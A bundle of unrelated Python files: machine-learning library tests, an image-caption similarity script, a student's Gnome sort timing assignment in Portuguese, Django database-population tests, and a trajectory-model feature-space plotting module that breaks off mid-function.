test_fval = fake_start.fval
# The fake start has the expected fval.
assert test_fval == expected_fval
def test_vis(pypesto_select_problem):
"""Test plotting routines."""
best_models = pypesto_select_problem.select_to_completion(
method=Method.FORWARD,
criterion=Criterion.AIC,
minimize_options=minimize_options,
)
pypesto.visualize.select.plot_selected_models(
selected_models=best_models,
criterion=Criterion.AIC,
)
pypesto.visualize.select.plot_history_digraph(
problem=pypesto_select_problem,
criterion=Criterion.AIC,
)
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
from unittest.mock import DEFAULT, Mock
import pytest
from torch.utils.data import DataLoader
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ProgressBarBase, RichProgressBar
from pytorch_lightning.callbacks.progress.rich_progress import RichProgressBarTheme
from tests.helpers.boring_model import BoringModel, RandomDataset, RandomIterableDataset
from tests.helpers.runif import RunIf
@RunIf(rich=True)
def test_rich_progress_bar_callback():
trainer = Trainer(callbacks=RichProgressBar())
progress_bars = [c for c in trainer.callbacks if isinstance(c, ProgressBarBase)]
assert len(progress_bars) == 1
assert isinstance(trainer.progress_bar_callback, RichProgressBar)
@RunIf(rich=True)
def test_rich_progress_bar_refresh_rate_enabled():
progress_bar = RichProgressBar(refresh_rate=1)
assert progress_bar.is_enabled
assert not progress_bar.is_disabled
progress_bar = RichProgressBar(refresh_rate=0)
assert not progress_bar.is_enabled
assert progress_bar.is_disabled
@RunIf(rich=True)
@mock.patch("pytorch_lightning.callbacks.progress.rich_progress.Progress.update")
@pytest.mark.parametrize("dataset", [RandomDataset(32, 64), RandomIterableDataset(32, 64)])
def test_rich_progress_bar(progress_update, tmpdir, dataset):
class TestModel(BoringModel):
def train_dataloader(self):
return DataLoader(dataset=dataset)
def val_dataloader(self):
return DataLoader(dataset=dataset)
def test_dataloader(self):
return DataLoader(dataset=dataset)
def predict_dataloader(self):
return DataLoader(dataset=dataset)
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
num_sanity_val_steps=0,
limit_train_batches=1,
limit_val_batches=1,
limit_test_batches=1,
limit_predict_batches=1,
max_steps=1,
callbacks=RichProgressBar(),
)
trainer.fit(model)
trainer.validate(model)
trainer.test(model)
trainer.predict(model)
assert progress_update.call_count == 8
def test_rich_progress_bar_import_error(monkeypatch):
import pytorch_lightning.callbacks.progress.rich_progress as imports
monkeypatch.setattr(imports, "_RICH_AVAILABLE", False)
with pytest.raises(ModuleNotFoundError, match="`RichProgressBar` requires `rich` >= 10.2.2."):
RichProgressBar()
@RunIf(rich=True)
def test_rich_progress_bar_custom_theme(tmpdir):
"""Test to ensure that custom theme styles are used."""
with mock.patch.multiple(
"pytorch_lightning.callbacks.progress.rich_progress",
CustomBarColumn=DEFAULT,
BatchesProcessedColumn=DEFAULT,
CustomTimeColumn=DEFAULT,
ProcessingSpeedColumn=DEFAULT,
) as mocks:
theme = RichProgressBarTheme()
progress_bar = RichProgressBar(theme=theme)
progress_bar.on_train_start(Trainer(tmpdir), BoringModel())
assert progress_bar.theme == theme
args, kwargs = mocks["CustomBarColumn"].call_args
assert kwargs["complete_style"] == theme.progress_bar
assert kwargs["finished_style"] == theme.progress_bar_finished
args, kwargs = mocks["BatchesProcessedColumn"].call_args
assert kwargs["style"] == theme.batch_progress
args, kwargs = mocks["CustomTimeColumn"].call_args
assert kwargs["style"] == theme.time
args, kwargs = mocks["ProcessingSpeedColumn"].call_args
assert kwargs["style"] == theme.processing_speed
@RunIf(rich=True)
def test_rich_progress_bar_keyboard_interrupt(tmpdir):
"""Test to ensure that when the user keyboard interrupts, we close the progress bar."""
class TestModel(BoringModel):
def on_train_start(self) -> None:
raise KeyboardInterrupt
model = TestModel()
with mock.patch(
"pytorch_lightning.callbacks.progress.rich_progress.Progress.stop", autospec=True
) as mock_progress_stop:
progress_bar = RichProgressBar()
trainer = Trainer(
default_root_dir=tmpdir,
fast_dev_run=True,
callbacks=progress_bar,
)
trainer.fit(model)
mock_progress_stop.assert_called_once()
@RunIf(rich=True)
def test_rich_progress_bar_configure_columns():
from rich.progress import TextColumn
custom_column = TextColumn("[progress.description]Testing Rich!")
class CustomRichProgressBar(RichProgressBar):
def configure_columns(self, trainer):
return [custom_column]
progress_bar = CustomRichProgressBar()
progress_bar._init_progress(Mock())
assert progress_bar.progress.columns[0] == custom_column
assert len(progress_bar.progress.columns) == 2
@RunIf(rich=True)
@pytest.mark.parametrize(("leave", "reset_call_count"), ([(True, 0), (False, 5)]))
def test_rich_progress_bar_leave(tmpdir, leave, reset_call_count):
# Calling `reset` means continuing on the same progress bar.
model = BoringModel()
with mock.patch(
"pytorch_lightning.callbacks.progress.rich_progress.Progress.reset", autospec=True
) as mock_progress_reset:
progress_bar = RichProgressBar(leave=leave)
trainer = Trainer(
default_root_dir=tmpdir,
num_sanity_val_steps=0,
limit_train_batches=1,
max_epochs=6,
callbacks=progress_bar,
)
trainer.fit(model)
assert mock_progress_reset.call_count == reset_call_count
@RunIf(rich=True)
@mock.patch("pytorch_lightning.callbacks.progress.rich_progress.Progress.update")
@pytest.mark.parametrize(("refresh_rate", "expected_call_count"), ([(0, 0), (3, 7)]))
def test_rich_progress_bar_refresh_rate(progress_update, tmpdir, refresh_rate, expected_call_count):
model = BoringModel()
trainer = Trainer(
default_root_dir=tmpdir,
num_sanity_val_steps=0,
limit_train_batches=6,
limit_val_batches=6,
max_epochs=1,
callbacks=RichProgressBar(refresh_rate=refresh_rate),
)
trainer.fit(model)
assert progress_update.call_count == expected_call_count
@RunIf(rich=True)
@pytest.mark.parametrize("limit_val_batches", (1, 5))
def test_rich_progress_bar_num_sanity_val_steps(tmpdir, limit_val_batches: int):
model = BoringModel()
progress_bar = RichProgressBar()
num_sanity_val_steps = 3
trainer = Trainer(
default_root_dir=tmpdir,
num_sanity_val_steps=num_sanity_val_steps,
limit_train_batches=1,
limit_val_batches=limit_val_batches,
max_epochs=1,
callbacks=progress_bar,
)
trainer.fit(model)
assert progress_bar.progress.tasks[0].completed == min(num_sanity_val_steps, limit_val_batches)
|
import os
import re
import argparse
import torch
from PIL import Image
from torchvision import transforms
from mmcv import Config
from mmcv.runner import load_checkpoint, save_checkpoint
from model import Model
def get_parameter():
parser = argparse.ArgumentParser()
parser.add_argument("--config", type=str, default="configs/baseline.py")
parser.add_argument("--checkpoint", type=str, default="checkpoint.pth")
parser.add_argument("--device", type=str, default="cpu")
parser.add_argument("--image", type=str, default="example/Barack Obama by Gage Skidmore.png")
parser.add_argument("--filename", type=str, default=None)
parser.add_argument("--caption", type=str, default="example/captions.txt")
args = parser.parse_args()
assert os.path.exists(args.config), f"{args.config} does not exists!"
assert os.path.exists(args.image), f"{args.image} does not exists!"
if args.filename is None:
args.filename = args.image.rsplit(os.sep, 1)[1].rsplit('.', 1)[0]
if args.caption is None:
raise ValueError('`--caption` should be either caption or path.')
elif os.path.exists(args.caption):
with open(args.caption, 'r') as f:
args.caption = f.readlines()
else:
args.caption = args.caption.split(';')
return args
def expand_to_three_channel(ts, size=224):
if ts.size(0) == 2:
ts = ts[:1]
return ts[:3].float().expand(3, size, size)
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Lambda(expand_to_three_channel),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
])
def load_image(image: str):
img_pil = Image.open(image)
img = transform(img_pil)
if hasattr(img_pil, "close"):
img_pil.close()
return img
def process_caption(caption: str):
caption = re.sub(r" \[SEP\]", r".", caption)
caption = re.sub(r" +", r" ", caption.strip())
return caption
def compute_similarity(model,
image: torch.FloatTensor,
filename: str,
caption: list):
if image.ndim == 3:
image = image.unsqueeze(0)
with torch.no_grad():
img_feat = model.forward(image, [filename]).cpu()
cap_feats = model.forward(caption).cpu()
similarity = torch.nn.functional.cosine_similarity(img_feat, cap_feats, dim=1)
return similarity
def inference(args):
cfg = Config.fromfile(args.config)
cfg.device = args.device
# init model
model = Model(device=cfg.device, **cfg.model).to(cfg.device)
if args.checkpoint:
load_checkpoint(model, args.checkpoint)
model.eval()
# load data
image = load_image(args.image)
filename = args.filename
captions = list(map(process_caption, args.caption))
# compute similarity
similarity = compute_similarity(model, image, filename, captions)
# display
for i, caption in enumerate(args.caption):
score = similarity[i]
print(f"similarity: {score:.4f} || {caption}")
if __name__ == "__main__":
inference(get_parameter())
|
#Class used for transfering lines to the write classes. Ex var assignments go to class Var
import Variable
import Objects
def init():
Objects.init()
def process(string):
if string[0] == "@":
Variable.process(string)
elif string[0] != "" or string[0] != "\n":
Objects.process(string)
|
#ATIVIDADE PEDIDA: (Prof.Ronaldo)####################################################################################################################################################{
#CT0111 – Décima primeira da primeira etapa
#Implementar o Gnome sort e imprimir os graficos conforme segue:
#
# *Tamanho da lista de números x Tempo para ordenar pelo método - OBRIGATÓRIO!
# [Tamanho da lista x Quantidade de operações (Número de comparações)] - OPCIONAL!
#
#As listas geradas devem ser de números aleatórios dos seguintes tamanhos: 100K, 200K, 400K, 500K, 1M, 2M. <-Devido ao algoritmo ter-se mostrado EXTREMAMENTE LENTO PARA O CASO DA LISTA RANDOMICA, A LISTA FOI DIMINUÍDA PARA ENTRADAS DE VALOR MENOR! #
#####################################################################################################################################################################################}
#"Importação das devidas bibliotecas ;)"
import sys
import math
import random
from random import randint
import timeit
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
###############################################################################{
#"Declarações iniciais..."
mpl.use('Agg')
mpl.rc('axes', linewidth=2)
plt.style.use('_classic_test')
sys.setrecursionlimit(10**9)
###############################################################################}
#"Segunda Função responsável pela criação do gráfico(x,y) para estudo do desempenho de algoritmo" *(Usada para criar o gráfico dos 3 casos apresentados juntos na mesma malha)
#Implementação do professor + implementação do aluno####################################################################################################{
def desenhaGrafico2(x, y, yde, yce, file_name, label, label2, label3, file_title, line_color, line_color2, line_color3, line_color4, line_color5, line_color6, xl, yl): #
fig = plt.figure(figsize=(20, 20))
ax = fig.add_subplot(111)
ax.plot(x,y, color=line_color,linestyle = '-',linewidth=3,label = label)
ax.plot(x,yde, color=line_color3,linestyle = '-',linewidth=2,label = label2)
ax.plot(x,yce, color=line_color5,linestyle = '-',linewidth=1,label = label3)
plt.scatter(x[5],y[5], s=800,marker='s',facecolor='none',edgecolors= line_color, linewidths=1.5)
plt.scatter(x[5],y[5], s=200,marker='x',facecolor=line_color2,edgecolors= line_color, linewidths=3)
plt.scatter(x[5],yde[5], s=800,marker='o',facecolor='none',edgecolors= line_color3, linewidths=1.5)
plt.scatter(x[5],yde[5], s=200,marker='x',facecolor=line_color4,edgecolors= line_color3, linewidths=3)
plt.scatter(x[5],yce[5], s=800,marker='^',facecolor='none',edgecolors= line_color5, linewidths=1.5)
plt.scatter(x[5],yce[5], s=200,marker='x',facecolor=line_color6,edgecolors= line_color5, linewidths=3)
ax.legend(bbox_to_anchor=(1, 1),bbox_transform=plt.gcf().transFigure)
plt.ylabel(yl)
plt.xlabel(xl)
plt.title(file_title)
fig.savefig(file_name)
########################################################################################################################################################}
#"Função Gnome Sort"
#Implementação do aluno#########################################################################{
def gnomeSort(lista):
pivota = 0
num_iteracoes = 0
lista_tam = len(lista)
while pivota < lista_tam - 1:
if lista[pivota] > lista[pivota + 1]:
lista[pivota + 1], lista[pivota] = lista[pivota], lista[pivota + 1]
num_iteracoes += 1
if pivota > 0:
pivota -= 2
pivota += 1
return num_iteracoes
################################################################################################}
#"Função que ordena um número determinado(em função da entrada) de valores gerados aleatoriamente ou em certa ordem específica(Para essa DÉCIMA PRIMEIRA ATIVIDADE será em ordem ALEATÓRIA) e retorna os devidos gráficos comparativos"
#O que estiver comentado no código da função abaixo foi usado para gerar os outros gráficos(Para os casos da lista ser DECRESCENTE ou CRESCENTE, os quais o aluno decidiu fazer apenas para fins acadêmicos).
#Implementação do aluno##########################################################################################################################################################################################################################################################################################################################################{
def cria_Graficos(lista_entrada): #
tempos_orden_Random = list()
tempos_orden_Decresc = list()
tempos_orden_Cresc = list()
num_iteracoes_Random = list()
num_iteracoes_Decresc = list()
num_iteracoes_Cresc = list()
j = 0
for i in lista_entrada:
#1) Lista Aleatória <- OBRIGATÓRIO(PEDIDO NA ATIVIDADE)
lista = list(range(0, i + 1))
random.shuffle(lista)
tempos_orden_Random.append(timeit.timeit("gnomeSort({})".format(lista),setup="from __main__ import gnomeSort",number=1))
num_iteracoes_Random.append(gnomeSort(lista))
#2) Lista já ORDENADA em ordem DECRESCENTE<- OPCIONAL(AMOSTRAGEM DO ALUNO)
lista = list(range(i,-1,-1))
tempos_orden_Decresc.append(timeit.timeit("gnomeSort({})".format(lista),setup="from __main__ import gnomeSort",number=1))
num_iteracoes_Decresc.append(gnomeSort(lista))
# #
#3) Lista já ORDENADA em ordem CRESCENTE<- OPCIONAL(AMOSTRAGEM DO ALUNO)
lista = list(range(0,i+1,1))
tempos_orden_Cresc.append(timeit.timeit("gnomeSort({})".format(lista),setup="from __main__ import gnomeSort",number=1))
num_iteracoes_Cresc.append(gnomeSort(lista))
j += 1
print(">>>[",j,"]\n")#Isso serve para saber se cada elemento da "lista_teste" está sendo corretamente compilado!
print(">>>Passou!\n")
desenhaGrafico2(lista_entrada,tempos_orden_Random,tempos_orden_Decresc,tempos_orden_Cresc,"GraficoGnomeSort(Tamanho_Lista-X-Tempo_Ordenacoes).png", "Tempo(Lista->Aleatória[Gnome Sort])","Tempo(Lista->Decrescente[Gnome Sort])","Tempo(Lista->Crescente[Gnome Sort])",'(Gnome Sort - Listas: Aleatória/Decrescente/Crescente)Tamanho_Lista X Tempo_Ordenacoes','magenta','darkmagenta','cyan','darkcyan','red','darkred',"<Entradas/>","<Tempo-Saída/>") #
desenhaGrafico2(lista_entrada,num_iteracoes_Random,num_iteracoes_Decresc,num_iteracoes_Cresc,"GraficoGnomeSort(Tamanho_Lista-X-Numero_Iteracoes).png", "SWAPS(Lista->Aleatória[Gnome Sort])","SWAPS(Lista->Decrescente[Gnome Sort])","SWAPS(Lista->Crescente[Gnome Sort])",'(Gnome Sort - Listas: Aleatória/Decrescente/Crescente)Tamanho_Lista X SWAPS','magenta','darkmagenta','cyan','darkcyan','red','darkred',"<Entradas/>","<Tempo-Saída/>") #
###################################################################################################################################################################################################################################################################################################################################################################}
#Inicialização da aplicação:
##########################################################################{
#lista_teste = [100000,200000,400000,500000,1000000,2000000]<-Para se ter ideia, levou mais de 1 Dia para rodar essa entrada no "Google Colabs" e ainda não havia compilado nem 4/6 do total direito!"
#################################################################################################
#Obs:.Essa foi a entrada que levou o menor TEMPO para mim,detalhe que ainda levou algumas horas!#
lista_teste = [1000,2000,3000,4000,5000,10000] #
#################################################################################################
cria_Graficos(lista_teste)
##########################################################################}
#############################
################
|
from django.apps import apps
from django.test import TestCase
from django.core.management import call_command
class PopulateDbtTests(TestCase):
"""Test Module for commands that populate db for prototype"""
def setUp(self):
call_command('populate_db')
def test_populate_institute(self):
"""Test whether institute model count is correct and test accuracy
by checking for one particular entry"""
engineering_exists = apps.get_model('core', 'Institute').objects.filter(name="Engineering")
count_all = apps.get_model('core', 'Institute').objects.count()
self.assertTrue(engineering_exists)
self.assertEqual(count_all, 3)
def test_populate_field_of_studies(self):
"""Test whether field of studies model count is correct and test accuracy
by checking for one particular entry"""
field_exists = apps.get_model('core', 'FieldOfStudies').objects.filter(name="Informatics")
count_all = apps.get_model('core', 'FieldOfStudies').objects.count()
self.assertTrue(field_exists)
self.assertEqual(count_all, 7)
def test_populate_user(self):
"""Test whether user model count is correct and test accuracy
by checking for one particular entry"""
user_exists = apps.get_model('core', 'User').objects.filter(name="John Wayne",
is_student=True)
count_all = apps.get_model('core', 'User').objects.count()
self.assertTrue(user_exists)
self.assertEqual(count_all, 47)
def test_populate_student(self):
"""Test whether student model count is correct and test accuracy
by checking for one particular entry"""
student_exists = apps.get_model('core', 'Student').objects.filter(
user__email="john.wayne.student@htw.com")
count_all = apps.get_model('core', 'Student').objects.count()
self.assertTrue(student_exists)
self.assertEqual(count_all, 20)
def test_populate_professor(self):
"""Test whether professor model count is correct and test accuracy
by checking for one particular entry"""
professor_exists = apps.get_model('core', 'Professor').objects.filter(
user__email="ana.summer.professor@htw.com")
count_all = apps.get_model('core', 'Professor').objects.count()
self.assertTrue(professor_exists)
self.assertEqual(count_all, 27)
def test_populate_course(self):
"""Test whether seminar model count is correct and test accuracy
by checking for one particular entry"""
course_exists = apps.get_model('core', 'Course').objects.filter(
name="Arabic literature in the Middle Ages ")
count_all = apps.get_model('core', 'Course').objects.count()
self.assertTrue(course_exists)
self.assertEqual(count_all, 23)
def test_add_courses_added_to_student(self):
"""Test whether courses are correctly added to student
by checking for one particular entry and count of student's courses"""
student = apps.get_model('core', 'Student').objects.get(
user__email="john.wayne.student@htw.com")
student_courses_count = student.course_set.count()
self.assertEqual(student_courses_count, 6)
|
import os
import cv2
import glob
import torch
import pathlib
import argparse
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
matplotlib.use('Agg')
from utils.dataset import create_images_dict
labels = {"all": "vanilla fine-tuning",
"encoder": "encoder adaptation",
"modulator": "modulator adaptation"}
labels_ckpt = {
'GT': 'groundtruth',
'INDG': 'in-domain generalization',
'OODG': 'out-of-domain generalization',
'FT': 'full finetuning',
'ET': 'encoder finetuning'
}
colors = {
'OODG': 'tab:blue', 'FT': 'tab:orange', 'ET': 'tab:red',
'diff_OODG_FT': 'tab:orange', 'diff_OODG_ET': 'tab:red'}
def create_few_shot_plot(results_dir, out_dir, fontsize=16):
update_modes = sorted(os.listdir(results_dir))
ades = {}
for update_mode in update_modes:
update_mode_dir = os.path.join(results_dir, update_mode)
seeds = os.listdir(update_mode_dir)
ades[update_mode] = {}
for seed in seeds:
seed_dir = os.path.join(update_mode_dir, seed)
num_files = os.listdir(seed_dir)
for num_file in num_files:
num = int(num_file.split('.csv')[0])
num_path = os.path.join(seed_dir, num_file)
# float(pd.read_csv(num_path).columns[0])
ade = float(pd.read_csv(num_path).values[0][0])
if num not in ades[update_mode]:
ades[update_mode][num] = []
ades[update_mode][num].append(ade)
zero_shot_path = results_dir.split("/")
zero_shot_path[-2] = "None"
zero_shot_path += ['eval', seed, '0.csv']
zero_shot_path = '/'.join(zero_shot_path)
if os.path.isfile(zero_shot_path):
# float(pd.read_csv(num_path).columns[0])
ade = float(pd.read_csv(zero_shot_path).values[0][0])
num = 0
if num not in ades[update_mode]:
ades[update_mode][num] = []
ades[update_mode][num].append(ade)
f, ax = plt.subplots(figsize=(6, 4))
for train_name, train_vals in ades.items():
v = [i for j in list(train_vals.values()) for i in j]
k = [j for j in list(train_vals.keys())
for _ in range(len(list(train_vals.values())[0]))]
df = pd.DataFrame({'x': k, 'y': v})
sns.lineplot(data=df, x='x', y='y',
label=labels[train_name], ax=ax, marker="o")
sns.despine()
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
plt.ylabel('ADE', fontsize=fontsize)
plt.xlabel('# Batches', fontsize=fontsize)
plt.xticks(fontsize=fontsize)
plt.yticks(fontsize=fontsize)
plt.legend(fontsize=fontsize)
ax.xaxis.set_major_locator(matplotlib.ticker.MaxNLocator(integer=True))
plt.savefig(f'{out_dir}/result.png', bbox_inches='tight', pad_inches=0)
def plot_input_space(semantic_images, observed_map, meta_ids, scene_id, out_dir='figures', format='png'):
# semantic_images: (batch_size, n_class, height, width)
# observed_map: (batch_size, obs_len, height, width)
fig, axes = plt.subplots(2, observed_map.shape[1], figsize=(observed_map.shape[1]*4, 2*4))
for i, meta_id in enumerate(meta_ids):
observed_map_i = observed_map[i]
semantic_image_i = semantic_images[i]
# plot semantic map
for c in range(semantic_image_i.shape[0]):
im = axes[0, c].imshow(semantic_image_i[c], vmin=0, vmax=1, interpolation='nearest')
divider = make_axes_locatable(axes[0, c])
cax = divider.append_axes('right', size='5%', pad=0.05)
fig.colorbar(im, cax=cax, orientation='vertical')
axes[0, c // 2].set_title('Semantic map')
# hide empty plots
for c in range(semantic_image_i.shape[0], observed_map_i.shape[0]):
axes[0, c].axis('off')
# plot observed trajectory map
for t in range(observed_map_i.shape[0]):
axes[1, t].imshow(observed_map_i[t], vmin=0, vmax=1)
axes[1, t // 2].set_title('Observed trajectory map')
# save
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
out_name = f'{meta_id}__{scene_id}'
out_path = os.path.join(out_dir, out_name + '.' + format)
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
def plot_feature_space(dict_features, out_dir='figures/feature_space', show_diff=True, format='png'):
"""Plot feature space
Args:
dict_features (dict):
{ckpt_name:
{scene_id:
{feature_name:
{np.array()},
...,
meta_ids:
list(),
}
}
}
out_dir (str, optional): _description_. Defaults to 'figures/feature_space'.
plot_diff (bool, optional): _description_. Defaults to False.
format (str, optional): _description_. Defaults to 'png'.
"""
# TODO: show colorbar
# TODO: add plot only first k figures
first_dict = dict_features[list(dict_features)[0]]
for scene_id, dict_scene in first_dict.items():
for i, meta_id in enumerate(dict_scene['metaId']):
features_name = list(dict_scene)
features_name.remove('metaId')
# for each sample, visualize feature space
if show_diff:
# show the difference between OODG and FT / ET
for _, feature_name in enumerate(features_name):
n_channel = dict_scene[feature_name].shape[1]
diff_i = {}
for ckpt_name in ['FT', 'ET']:
if ('OODG' in dict_features.keys()) & (ckpt_name in dict_features.keys()):
diff_i[ckpt_name] = dict_features['OODG'][scene_id][feature_name][i] - \
dict_features[ckpt_name][scene_id][feature_name][i]
height, width = diff_i[ckpt_name][0].shape
while height >= 6:
height /= 2
width /= 2
fig, axes = plt.subplots(
len(diff_i), n_channel, figsize=(n_channel*width, len(diff_i)*height))
for k, ckpt_name in enumerate(diff_i):
for c in range(n_channel):
if len(axes.shape) == 1:
axes[c].imshow(diff_i[ckpt_name][c])
axes[c].set_xlabel(f'channel_{c+1}')
if c == 0: axes[c].set_ylabel(labels_ckpt[ckpt_name])
else:
axes[k, c].imshow(diff_i[ckpt_name][c])
axes[k, c].set_xlabel(f'channel_{c+1}')
if c == 0: axes[k, c].set_ylabel(labels_ckpt[ckpt_name])
title = f'meta_id={meta_id}, scene_id={scene_id}, feature_name={feature_name}'
if len(axes.shape) == 1:
axes[n_channel//2].set_title(title)
else:
axes[0, n_channel//2].set_title(title)
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
out_name = f'{meta_id}__{scene_id}__{feature_name}_diff'
out_path = os.path.join(out_dir, out_name + '.' + format)
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
else:
# show the original feature space
for _, feature_name in enumerate(features_name):
n_channel = dict_scene[feature_name].shape[1]
n_ckpt = len(dict_features)
height, width = dict_ckpt[scene_id][feature_name][i].shape
while height >= 6:
height /= 2
width /= 2
fig, axes = plt.subplots(n_ckpt, n_channel,
figsize=(n_channel*width, n_ckpt*height))
for k, (ckpt_name, dict_ckpt) in enumerate(dict_features.items()):
feature_i = dict_ckpt[scene_id][feature_name][i] # (n_channel, height, width)
for c in range(n_channel):
if len(axes.shape) == 1:
axes[c].imshow(feature_i[c])
axes[c].set_xlabel(f'channel_{c+1}')
if c == 0: axes[c].set_ylabel(labels_ckpt[ckpt_name])
else:
axes[k, c].imshow(feature_i[c])
axes[k, c].set_xlabel(f'channel_{c+1}')
if c == 0: axes[k, c].set_ylabel(labels_ckpt[ckpt_name])
title = f'meta_id={meta_id}, scene_id={scene_id}, feature_name={feature_name}'
if len(axes.shape) == 1:
axes[n_channel//2].set_title(title)
else:
axes[0, n_channel//2].set_title(title)
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
out_name = f'{meta_id}__{scene_id}__{feature_name}'
out_path = os.path.join(out_dir, out_name + '.' + format)
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
def plot_feature_space_diff_evolution(
dict_features, out_dir='figures/feature_space_diff',
encoder_only=False, diff_type='absolute',
by_scene=True, format='png'):
"""Plot the difference of OODG and FT/ET along with layers.
Args:
dict_features (dict):
Dict storing all features.
out_dir (str, optional):
Path for figures. Defaults to 'figures/feature_space_diff'.
encoder_only (bool, optional):
Visualize only encoder or the whole network. Defaults to False.
diff_type (str, optional):
[absolute, relative]. Defaults to 'absolute'.
by_scene (str, optional):
Defaults to True.
format (str, optional):
format. Defaults to 'png'.
Raises:
ValueError: _description_
"""
diff_dict, df_dict, original_dict, ckpt_scene_dict = {}, {}, {}, {}
df_original = pd.DataFrame()
for ckpt_name in ['FT', 'ET']:
if ('OODG' in dict_features.keys()) & (ckpt_name in dict_features.keys()):
name = f'diff_OODG_{ckpt_name}'
diff_dict[name] = {}
original_dict['OODG'] = {}
original_dict[ckpt_name] = {}
ckpt_scene_dict[ckpt_name] = {}
for s, (scene_id, dict_scene) in enumerate(dict_features[list(dict_features)[0]].items()):
features_name = list(dict_scene)
features_name.remove('metaId')
if encoder_only:
features_name = [f for f in features_name if 'Encoder' in f]
if s == 0:
for feature_name in features_name:
diff_dict[name][feature_name] = []
original_dict['OODG'][feature_name] = []
original_dict[ckpt_name][feature_name] = []
index = dict_scene['metaId']
ckpt_scene_df = pd.DataFrame(index=index)
for feature_name in features_name:
# diff using all pixels and channels
n_tot = dict_features['OODG'][scene_id][feature_name][0].reshape(-1).shape[0]
original_oodg = dict_features['OODG'][scene_id][feature_name]
original_ckpt = dict_features[ckpt_name][scene_id][feature_name]
diff = original_oodg - original_ckpt
if diff_type == 'overall_relative':
add = diff.mean(axis=(1,2,3)) / original_oodg.mean(axis=(1,2,3))
elif diff_type == 'pixel_relative':
add = np.empty(diff.shape)
add.fill(np.nan)
np.divide(diff, original_oodg, out=add, where=original_oodg!=0)
add = np.nanmean(add, axis=(1,2,3))
else:
raise ValueError(f'No support for diff_type={diff_type}')
diff_dict[name][feature_name].extend(add)
ckpt_scene_df.loc[index, feature_name] = add
original_dict['OODG'][feature_name].extend(original_oodg.sum(axis=(1,2,3))/n_tot)
original_dict[ckpt_name][feature_name].extend(original_ckpt.sum(axis=(1,2,3))/n_tot)
ckpt_scene_dict[ckpt_name][scene_id] = ckpt_scene_df
# average over samples
df = pd.DataFrame()
n_data = len(diff_dict[name][features_name[0]])
for feature_name in features_name:
df.loc[feature_name, name] = np.mean(diff_dict[name][feature_name])
df.loc[feature_name, name+'_std'] = np.std(diff_dict[name][feature_name])
df_original.loc[feature_name, 'OODG'] = np.mean(original_dict['OODG'][feature_name])
df_original.loc[feature_name, 'OODG_std'] = np.std(original_dict['OODG'][feature_name])
df_original.loc[feature_name, ckpt_name] = np.mean(original_dict[ckpt_name][feature_name])
df_original.loc[feature_name, ckpt_name+'_std'] = np.std(original_dict[ckpt_name][feature_name])
df_dict[name] = df
# plot configuration
if df.shape[0] == 3:
fig_size, depth = 4, 0
elif df.shape[0] == 20: # 6+7+7
fig_size, depth = 10, 1
elif df.shape[0] == 83: # 23+30+30
fig_size, depth = 20, 2
else:
# when encoder_only=True, depth will be unknown
fig_size, depth = df.shape[0]*0.25 + 4, df.shape[0]
# ## feature space difference plot along with layers
fig, ax = plt.subplots(figsize=(fig_size, 4))
plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
for name in df_dict.keys():
df = df_dict[name]
for b, block in enumerate(['Encoder', 'GoalDecoder', 'TrajDecoder']):
df_block = df[df.index.str.contains(block)]
if df_block.shape[0]:
if b == 0:
plt.plot(df_block.index, df_block[name].values, '.-', c=colors[name], label=name)
else:
plt.plot(df_block.index, df_block[name].values, '.-', c=colors[name])
plt.fill_between(df_block.index, df_block[name].values - df_block[name+'_std'].values,
df_block[name].values + df_block[name+'_std'].values, color=colors[name], alpha=0.2)
plt.title('Feature space difference')
plt.ylabel(f'{diff_type} difference')
plt.xlabel('Layers')
plt.legend(loc='best')
if (depth == 0) | (depth == 1) | (encoder_only):
plt.xticks(rotation=45, ha='right')
else: # (depth == 2) | (depth == unknown)
plt.xticks(rotation=90, ha='right')
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
out_name = f'{"_".join(df_dict.keys())}__D{depth}__N{n_data}__{diff_type}'
if encoder_only: out_name += '__encoder'
out_path = os.path.join(out_dir, f'{out_name}.{format}')
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
# ## plot the original values in feature space
fig, ax = plt.subplots(figsize=(fig_size, 4))
for ckpt_name in original_dict.keys():
for b, block in enumerate(['Encoder', 'GoalDecoder', 'TrajDecoder']):
df_block = df_original[df_original.index.str.contains(block)]
if df_block.shape[0]:
if b == 0:
plt.plot(df_block.index, df_block[ckpt_name].values, '.-', c=colors[ckpt_name], label=ckpt_name)
else:
plt.plot(df_block.index, df_block[ckpt_name].values, '.-', c=colors[ckpt_name])
plt.fill_between(df_block.index, df_block[ckpt_name].values - df_block[ckpt_name+'_std'].values,
df_block[ckpt_name].values + df_block[ckpt_name+'_std'].values, color=colors[ckpt_name], alpha=0.2)
plt.title('Feature space')
plt.ylabel('Value')
plt.xlabel('Layers')
plt.legend(loc='best')
if (depth == 0) | (depth == 1) | (encoder_only):
plt.xticks(rotation=45, ha='right')
else: # (depth == 2) | (depth == unknown)
plt.xticks(rotation=90, ha='right')
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
out_name = f'{"_".join(original_dict.keys())}__D{depth}__N{n_data}'
